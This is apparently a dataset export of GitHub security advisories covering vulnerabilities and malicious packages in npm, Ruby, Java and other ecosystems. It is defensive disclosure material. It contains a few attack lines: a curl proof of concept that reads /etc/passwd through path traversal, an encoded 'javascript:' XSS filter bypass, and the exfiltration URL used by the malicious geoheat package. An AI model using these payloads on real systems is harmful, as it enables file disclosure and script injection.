ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-g4mq-6fp5-qwcf
Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible
A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with "umask 77 && mkdir -p <dir>"; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc/<pid>/cmdline'.
{'CVE-2020-1733'}
2022-04-26T18:13:07Z
2021-04-20T16:46:12Z
MODERATE
5
{'CWE-362', 'CWE-377', 'CWE-668'}
{'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html', 'https://security.gentoo.org/glsa/202006-11', 'https://www.debian.org/security/2021/dsa-4950', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/', 'https://github.com/advisories/GHSA-g4mq-6fp5-qwcf', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1733', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1733', 'https://github.com/ansible/ansible/issues/67791', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}
null
GHSA
GHSA-wjf2-7f9g-86f5
Malicious Package in fast-requests
All versions of `fast-requests` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts. ## Recommendation Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.
null
2021-09-30T20:05:44Z
2020-09-03T18:23:38Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-wjf2-7f9g-86f5', 'https://www.npmjs.com/advisories/1086'}
null
GHSA
GHSA-xmxh-g7wj-8m4m
OS Command Injection in curling
npm package `curling` before version 1.1.0 is vulnerable to Command Injection via the run function. The command argument can be controlled by users without any sanitization.
{'CVE-2019-10789'}
2021-04-13T15:32:26Z
2021-04-13T15:32:26Z
HIGH
9.8
{'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10789', 'https://github.com/advisories/GHSA-xmxh-g7wj-8m4m', 'https://snyk.io/vuln/SNYK-JS-CURLING-546484', 'https://github.com/hgarcia/curling/blob/e861d625c074679a2931bcf4ce8da0afa8162c53/lib/curl-transport.js#L56'}
null
GHSA
GHSA-xxfr-jrgh-x392
Remote code execution in ChakraCore
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1180.
{'CVE-2020-1172'}
2021-08-02T17:29:01Z
2021-08-02T17:29:01Z
HIGH
7.5
{'CWE-787'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-1172', 'https://github.com/advisories/GHSA-xxfr-jrgh-x392', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1172', 'https://github.com/chakra-core/ChakraCore/pull/6500'}
null
GHSA
GHSA-p4x4-rw2p-8j8m
Cross-site Scripting in Sanitize
When HTML is sanitized using Sanitize's "relaxed" config or a custom config that allows certain elements, some content in a `<math>` or `<svg>` element may not be sanitized correctly even if `math` and `svg` are not in the allowlist. You are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom config that allows one or more of the following HTML elements: - `iframe` - `math` - `noembed` - `noframes` - `noscript` - `plaintext` - `script` - `style` - `svg` - `xmp` ### Impact Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize, potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser. ### Releases This problem has been fixed in Sanitize 5.2.1. ### Workarounds If upgrading is not possible, a workaround is to override the default value of Sanitize's `:remove_contents` config option with the following value, which ensures that the contents of `math` and `svg` elements (among others) are removed entirely when those elements are not in the allowlist: ```ruby %w[iframe math noembed noframes noscript plaintext script style svg xmp] ``` For example, if you currently use Sanitize's relaxed config, you can create a custom config object that overrides the default value of `:remove_contents` like this: ```ruby custom_config = Sanitize::Config.merge( Sanitize::Config::RELAXED, :remove_contents => %w[iframe math noembed noframes noscript plaintext script style svg xmp] ) ``` You would then pass this custom config to Sanitize when sanitizing HTML. ### For more information If you have any questions or comments about this advisory: - Open an issue in the [Sanitize repo](https://github.com/rgrove/sanitize). - See Sanitize's [security policy](https://github.com/rgrove/sanitize/security/policy). ### Credits Many thanks to Michal Bentkowski of Securitum for reporting this bug and helping to verify the fix. ### References - [GHSA-p4x4-rw2p-8j8m](https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m) - [CVE-2020-4054](https://nvd.nist.gov/vuln/detail/CVE-2020-4054) - https://github.com/rgrove/sanitize/releases/tag/v5.2.1
{'CVE-2020-4054'}
2021-01-08T17:08:41Z
2020-06-16T22:08:06Z
HIGH
7.3
{'CWE-79'}
{'https://github.com/advisories/GHSA-p4x4-rw2p-8j8m', 'https://github.com/rgrove/sanitize/commit/a11498de9e283cd457b35ee252983662f7452aa9', 'https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4054', 'https://github.com/rgrove/sanitize/releases/tag/v5.2.1', 'https://www.debian.org/security/2020/dsa-4730', 'https://usn.ubuntu.com/4543-1/'}
null
GHSA
GHSA-wc4x-4gm2-74j8
Improper Certificate Validation in Apache Geode
When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake. This could compromise intra-cluster communication using a man-in-the-middle attack.
{'CVE-2019-10091'}
2022-02-10T20:51:04Z
2022-02-10T20:51:04Z
MODERATE
7.4
{'CWE-295'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10091', 'https://lists.apache.org/thread.html/r3342077ac4798631300366be86e545d0c08753cca8fd2663867fe200%40%3Cdev.geode.apache.org%3E', 'https://github.com/advisories/GHSA-wc4x-4gm2-74j8'}
null
GHSA
GHSA-32xf-jwmv-9hf3
Directory traversal attack in Spring Cloud Config
Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
{'CVE-2020-5410'}
2021-01-08T20:13:13Z
2020-06-05T16:13:20Z
MODERATE
0
{'CWE-23'}
{'https://github.com/advisories/GHSA-32xf-jwmv-9hf3', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5410', 'https://tanzu.vmware.com/security/cve-2020-5410'}
null
GHSA
GHSA-g2pf-qjgf-6fw3
Downloads Resources over HTTP in openframe-glslviewer
Affected versions of `openframe-glslviewer` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `openframe-glslviewer`. ## Recommendation No patch is currently available for this vulnerability, and the package hasn't been updated since 2014. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10607'}
2021-09-16T20:41:46Z
2019-02-18T23:33:42Z
HIGH
0
{'CWE-311', 'CWE-269'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10607', 'https://github.com/advisories/GHSA-g2pf-qjgf-6fw3', 'https://nodesecurity.io/advisories/208', 'https://www.npmjs.com/advisories/208'}
null
GHSA
GHSA-6rmq-x2hv-vxpp
Vulnerable third party libraries in certain configurations of Symfony
In Drupal Core versions 7.x prior to 7.62, 8.6.x prior to 8.6.6 and 8.5.x prior to 8.5.9; Drupal core uses the third-party PEAR Archive_Tar library. This library has released a security update which impacts some Drupal configurations. Refer to CVE-2018-1000888 for details
{'CVE-2019-6338'}
2021-08-19T15:23:19Z
2019-12-02T18:11:25Z
HIGH
8
{'CWE-502'}
{'https://www.debian.org/security/2019/dsa-4370', 'http://www.securityfocus.com/bid/106706', 'https://lists.debian.org/debian-lts-announce/2019/02/msg00032.html', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2019-6338.yaml', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6338', 'https://github.com/advisories/GHSA-6rmq-x2hv-vxpp', 'https://www.drupal.org/sa-core-2019-001'}
null
GHSA
GHSA-gggp-gh2p-996x
Path Traversal in LemMinX
A flaw was found in LemMinX in versions prior to 0.19.0. Cache poisoning of external schema files is possible due to directory traversal.
{'CVE-2022-0673'}
2022-03-02T21:56:44Z
2022-02-19T00:01:27Z
MODERATE
6.5
{'CWE-22'}
{'https://github.com/eclipse/lemminx/pull/1171', 'https://github.com/eclipse/lemminx/blob/master/CHANGELOG.md#0190-february-14-2022', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0673', 'https://github.com/advisories/GHSA-gggp-gh2p-996x'}
null
GHSA
GHSA-6rhx-hqxm-8p36
Double free in http
An issue was discovered in the http crate before 0.1.20 for Rust. The HeaderMap::Drain API can use a raw pointer, defeating soundness.
{'CVE-2019-25009'}
2021-08-25T20:46:44Z
2021-08-25T20:46:44Z
CRITICAL
9.8
{'CWE-415'}
{'https://rustsec.org/advisories/RUSTSEC-2019-0034.html', 'https://github.com/advisories/GHSA-6rhx-hqxm-8p36', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25009'}
null
GHSA
GHSA-xg6r-5gx4-qxjm
invoiceninja is vulnerable to Cross-site Scripting
invoiceninja is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
{'CVE-2021-3977'}
2022-01-06T21:58:34Z
2022-01-06T21:58:34Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/invoiceninja/invoiceninja/releases/tag/v5.3.35', 'https://github.com/advisories/GHSA-xg6r-5gx4-qxjm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3977', 'https://github.com/invoiceninja/invoiceninja/commit/1186eaa82375692d01d5ef3369c5b7bc7315b55f', 'https://huntr.dev/bounties/99c4ed09-b66f-474a-bd74-eeccf9339fde'}
null
GHSA
GHSA-769c-qphh-g3wm
Downloads Resources over HTTP in macaca-chromedriver
Affected versions of `macaca-chromedriver` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `macaca-chromedriver`. ## Recommendation Update to version 1.0.29 or later.
{'CVE-2016-10586'}
2021-01-08T20:58:41Z
2019-02-18T23:51:09Z
HIGH
0
{'CWE-311'}
{'https://github.com/advisories/GHSA-769c-qphh-g3wm', 'https://www.npmjs.com/advisories/180', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10586', 'https://nodesecurity.io/advisories/180'}
null
GHSA
GHSA-6p48-xfj3-jw67
Downloads Resources over HTTP in fibjs
Affected versions of `fibjs` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `fibjs`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10621'}
2021-01-08T19:21:02Z
2019-02-18T23:56:54Z
HIGH
0
{'CWE-311'}
{'https://github.com/advisories/GHSA-6p48-xfj3-jw67', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10621', 'https://nodesecurity.io/advisories/217', 'https://www.npmjs.com/advisories/217'}
null
GHSA
GHSA-f94m-mqhr-mc29
Moderate severity vulnerability that affects io.spray:spray-json_2.10, io.spray:spray-json_2.11, and io.spray:spray-json_2.12
Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of Algorithmic Complexity during the parsing of a field composed of many decimal digits.
{'CVE-2018-18853'}
2021-09-09T21:50:22Z
2018-11-09T17:42:26Z
HIGH
7.5
{'CWE-400'}
{'https://github.com/advisories/GHSA-f94m-mqhr-mc29', 'https://github.com/spray/spray-json/issues/278', 'https://nvd.nist.gov/vuln/detail/CVE-2018-18853'}
null
GHSA
GHSA-5q6m-3h65-w53x
Improper Neutralization of Special Elements used in an OS Command.
react-dev-utils prior to v11.0.4 exposes a function, getProcessForPort, where an input argument is concatenated into a command string to be executed. This function is typically used from react-scripts (in Create React App projects), where the usage is safe. Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.
{'CVE-2021-24033'}
2021-03-11T22:26:09Z
2021-03-11T22:26:09Z
MODERATE
0
{'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-24033', 'https://github.com/facebook/create-react-app/pull/10644', 'https://github.com/facebook/create-react-app/commit/f5e415f3a5b66f07dcc60aba1b445fa7cda97268', 'https://www.facebook.com/security/advisories/cve-2021-24033', 'https://github.com/advisories/GHSA-5q6m-3h65-w53x'}
null
GHSA
GHSA-rprj-g6xc-p5gq
Moderate severity vulnerability that affects wicked
Directory traversal vulnerability in controller/concerns/render_redirect.rb in the Wicked gem before 1.0.1 for Ruby allows remote attackers to read arbitrary files via a %2E%2E%2F (encoded dot dot slash) in the step.
{'CVE-2013-4413'}
2021-09-17T19:24:02Z
2017-10-24T18:33:37Z
MODERATE
0
{'CWE-22'}
{'https://github.com/advisories/GHSA-rprj-g6xc-p5gq', 'http://www.securityfocus.com/bid/62891', 'http://secunia.com/advisories/55151', 'http://seclists.org/oss-sec/2013/q4/43', 'https://github.com/schneems/wicked/commit/fe31bb2533fffc9d098c69ebeb7afc3b80509f53', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/87783', 'https://nvd.nist.gov/vuln/detail/CVE-2013-4413'}
null
GHSA
GHSA-64x2-gq24-75pv
Cross-site scripting in Apache CXF
By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.
{'CVE-2020-13954'}
2022-04-22T17:19:15Z
2021-04-22T16:15:23Z
MODERATE
6.1
{'CWE-79'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r640719c9ce5671f239a6f002c20e14062effe4b318a580b6746aa5ef@%3Cdev.syncope.apache.org%3E', 'https://lists.apache.org/thread.html/r81a41a2915985d49bc3ea57dde2018b03584a863878a8532a89f993f@%3Cusers.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://security.netapp.com/advisory/ntap-20210513-0010/', 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cannounce.apache.org%3E', 'http://cxf.apache.org/security-advisories.data/CVE-2020-13954.txt.asc?version=1&modificationDate=1605183670659&api=v2', 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cdev.cxf.apache.org%3E', 'https://github.com/advisories/GHSA-64x2-gq24-75pv', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13954', 'http://www.openwall.com/lists/oss-security/2020/11/12/2', 'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cusers.cxf.apache.org%3E'}
null
GHSA
GHSA-m72m-mhq2-9p6c
Uncaught Exception in jsoup
### Impact _What kind of vulnerability is it? Who is impacted?_ Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Users should upgrade to jsoup 1.14.2 ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Users may rate limit input parsing. Users should limit the size of inputs based on system resources. Users should implement thread watchdogs to cap and timeout parse runtimes.
{'CVE-2021-37714'}
2022-04-19T19:03:05Z
2021-08-23T19:42:38Z
HIGH
7.5
{'CWE-248', 'CWE-835'}
{'https://jsoup.org/news/release-1.14.2', 'https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E', 'https://github.com/advisories/GHSA-m72m-mhq2-9p6c', 'https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E', 'https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20220210-0022/', 'https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E', 'https://jsoup.org/news/release-1.14.1', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37714', 'https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c', 'https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E', 'https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E', 'https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-p32g-242c-76h3
Malicious Package in geoheat
Version 1.3.2 of `geoheat` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
null
2020-09-11T21:14:49Z
2020-09-11T21:14:49Z
CRITICAL
0
null
{'https://www.npmjs.com/advisories/932', 'https://github.com/advisories/GHSA-p32g-242c-76h3'}
null
GHSA
GHSA-458f-26r3-x2c3
Cross-site Scripting in github.com/schollz/rwtxt
Cross-site scripting vulnerability in rwtxt versions prior to v1.8.6 allows a remote attacker to inject an arbitrary script via unspecified vectors.
{'CVE-2021-20848'}
2021-11-29T18:00:21Z
2021-11-29T18:00:21Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-458f-26r3-x2c3', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20848', 'https://github.com/schollz/rwtxt', 'https://jvn.jp/en/jp/JVN22515597/index.html'}
null
GHSA
GHSA-qwj8-p662-3m7x
Path Traversal in localhost-now
All versions of `localhost-now` are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
{'CVE-2019-5416'}
2021-01-08T20:11:38Z
2019-03-25T16:17:05Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-5416', 'https://hackerone.com/reports/334837', 'https://github.com/advisories/GHSA-qwj8-p662-3m7x', 'https://www.npmjs.com/advisories/1005'}
null
GHSA
GHSA-7jfh-2xc9-ccv7
Cross-Site Scripting in public
All versions of `public` are vulnerable to stored cross-site scripting (XSS). ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time.
null
2021-08-04T20:24:18Z
2019-05-31T23:46:40Z
LOW
0
{'CWE-79'}
{'https://hackerone.com/reports/316346', 'https://github.com/advisories/GHSA-7jfh-2xc9-ccv7', 'https://www.npmjs.com/advisories/609'}
null
GHSA
GHSA-cfw5-v7cw-69cw
Critical severity vulnerability that affects org.apache.directory.api:apache-ldap-api
In Apache LDAP API before 1.0.2, a bug in the way the SSL Filter was setup made it possible for another thread to use the connection before the TLS layer has been established, if the connection has already been used and put back in a pool of connections, leading to leaking any information contained in this request (including the credentials when sending a BIND request).
{'CVE-2018-1337'}
2021-09-09T17:08:41Z
2018-11-09T17:49:49Z
CRITICAL
9.8
{'CWE-200'}
{'https://lists.apache.org/thread.html/r56b304fb9960c869995efbb31da3b9b7c6d53ee31f7f7048eb80434b@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r4da40aa50cfdb2158898f2bc6df81feec1d42c6a06db6537d5cc0496@%3Cjira.kafka.apache.org%3E', 'http://www.securityfocus.com/bid/104744', 'https://lists.apache.org/thread.html/r0e645b3f6ca977dc60b7cec231215c59a9471736c2402c1fef5a0616@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r1a258430d820a90ff9d4558319296cc517ff2252327d7b3546d16749@%3Cjira.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1337', 'https://github.com/advisories/GHSA-cfw5-v7cw-69cw', 'https://lists.apache.org/thread.html/r1815fb5b0c345f571c740e7a1b48d7477647edd4ffcf9d5321e69446@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r55e74532e7f9e84ecfa56b4e0a50a5fe0ba6f7a76880520e4400b0d7@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/d66081195e9a02ee7cc20fb243b60467d1419586eed28297d820768f@%3Cdev.directory.apache.org%3E'}
null
GHSA
GHSA-xg5r-8j97-2wrj
Directory Traversal in restafary
Affected versions of `restafary` are susceptible to a directory traversal vulnerability when a root path is specified in the configuration. Proof of Concept ``` curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd' ``` ## Recommendation Update to version 1.6.1 or later.
{'CVE-2016-10528'}
2021-01-08T00:07:32Z
2019-02-18T23:39:22Z
MODERATE
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10528', 'https://github.com/advisories/GHSA-xg5r-8j97-2wrj', 'https://www.npmjs.com/advisories/89', 'https://nodesecurity.io/advisories/89'}
null
GHSA
GHSA-v5rv-hpxg-8x49
Signature validation bypass in ServiceStack
ServiceStack before 5.9.2 mishandles JWT signature verification unless an application has a custom ValidateToken function that establishes a valid minimum length for a signature.
{'CVE-2020-28042'}
2021-01-13T19:13:11Z
2021-01-13T19:13:11Z
MODERATE
0
{'CWE-347'}
{'https://forums.servicestack.net/t/servicestack-v5-9-2-released/8850', 'https://www.shielder.it/advisories/servicestack-jwt-signature-verification-bypass/', 'https://www.nuget.org/packages/ServiceStack/', 'https://snyk.io/vuln/SNYK-DOTNET-SERVICESTACK-1035519', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28042', 'https://github.com/ServiceStack/ServiceStack/commit/540d4060e877a03ae95343c1a8560a26768585ee', 'https://github.com/advisories/GHSA-v5rv-hpxg-8x49', 'https://www.shielder.it/blog/2020/11/re-discovering-a-jwt-authentication-bypass-in-servicestack/'}
null
GHSA
GHSA-rmp7-f2vp-3rq4
Cross-site scripting in SiCKRAGE
in SiCKRAGE, versions 4.2.0 to 10.0.11.dev1 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly when processed by the server. Therefore, an attacker can inject arbitrary JavaScript code inside the application, and possibly steal a user’s sensitive information.
{'CVE-2021-25925'}
2021-04-23T19:28:53Z
2021-04-20T16:31:54Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/SiCKRAGE/SiCKRAGE/commit/9f42426727e16609ad3d1337f6637588b8ed28e4', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25925', 'https://github.com/advisories/GHSA-rmp7-f2vp-3rq4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-25925'}
null
GHSA
GHSA-vf77-8h7g-gghp
Improper Restriction of Operations within the Bounds of a Memory Buffer in Apache Tomcat
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.
{'CVE-2020-13934'}
2022-02-10T11:35:14Z
2022-02-08T22:05:00Z
HIGH
7.5
{'CWE-119', 'CWE-476'}
{'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00084.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://usn.ubuntu.com/4596-1/', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00088.html', 'https://www.debian.org/security/2020/dsa-4727', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.debian.org/debian-lts-announce/2020/07/msg00017.html', 'https://github.com/advisories/GHSA-vf77-8h7g-gghp', 'https://lists.apache.org/thread.html/r61f411cf82488d6ec213063fc15feeeb88e31b0ca9c29652ee4f962e%40%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/ra072b1f786e7d139e86f1d1145572e0ff71cef38a96d9c6f5362aac8@%3Cdev.tomcat.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13934', 'https://security.netapp.com/advisory/ntap-20200724-0003/'}
null
GHSA
GHSA-52vv-3vf7-f7wh
Server-Side Request Forgery and Uncontrolled Resource Consumption in LemMinX
A flaw was found in vscode-xml in versions prior to 0.19.0. Schema download could lead to blind SSRF or DoS via a large file.
{'CVE-2022-0671'}
2022-03-02T21:57:10Z
2022-02-19T00:01:28Z
CRITICAL
9.1
{'CWE-400', 'CWE-918'}
{'https://github.com/eclipse/lemminx/issues/1169', 'https://github.com/redhat-developer/vscode-xml/blob/master/CHANGELOG.md#0190-february-14-2022', 'https://github.com/eclipse/lemminx/blob/master/CHANGELOG.md#0190-february-14-2022', 'https://github.com/advisories/GHSA-52vv-3vf7-f7wh', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0671'}
null
GHSA
GHSA-7xj5-fwqr-5378
Cross-site Scripting in craftcms/cms
Craft CMS before 3.7.29 allows cross-site scripting.
{'CVE-2022-28378'}
2022-04-18T22:20:40Z
2022-04-04T00:00:54Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3729---2022-01-18', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28378', 'https://github.com/advisories/GHSA-7xj5-fwqr-5378', 'https://github.com/craftcms/cms/commit/7ca2b2d2ccecfb524525afc8ceac6f6e44f84b88'}
null
GHSA
GHSA-79mx-88w7-8f7q
XSS Filter Bypass via Encoded URL in validator
Versions of `validator` prior to 2.0.0 contained an xss filter method that is affected by several filter bypasses. This may result in a cross-site scripting vulnerability. ## Proof of Concept The xss() function removes the word "javascript" when contained inside an attribute. However, it does not properly handle cases where characters have been hex-encoded. As a result, it is possible to build an input that bypasses the filter but which the browser will accept as valid JavaScript. For example: ```<a href="jav&#x61;script:...">abc</a>``` will render as: ```<a href="javascript:...">abc</a>``` ## Recommendation The package author has decided to remove the xss filter functionality in the latest version of this module. If this feature is not currently being used, you are not affected by the vulnerability. If it is being used, updating to the latest version of the module will break your application. In order for affected users to mitigate this vulnerability, it is necessary to use an [alternative package](https://www.npmjs.com/search?q=xss%20filter&page=1&ranking=optimal) that provides similar functionality.
{'CVE-2014-9772'}
2021-09-02T21:06:03Z
2018-11-06T23:12:49Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/chriso/validator.js/issues/181', 'http://www.securityfocus.com/bid/97102', 'https://github.com/advisories/GHSA-79mx-88w7-8f7q', 'https://www.npmjs.com/advisories/43', 'https://nvd.nist.gov/vuln/detail/CVE-2014-9772', 'http://www.openwall.com/lists/oss-security/2016/04/20/11', 'https://nodesecurity.io/advisories/43'}
null
GHSA
GHSA-mw75-qvfr-hpmr
Cross-site Scripting in ShowDoc
ShowDoc is vulnerable to stored cross-site scripting through file upload in versions 2.10.3 and prior. A patch is available and anticipated to be part of version 2.10.4.
{'CVE-2022-0938'}
2022-03-23T15:39:32Z
2022-03-15T00:01:01Z
MODERATE
5.4
{'CWE-79'}
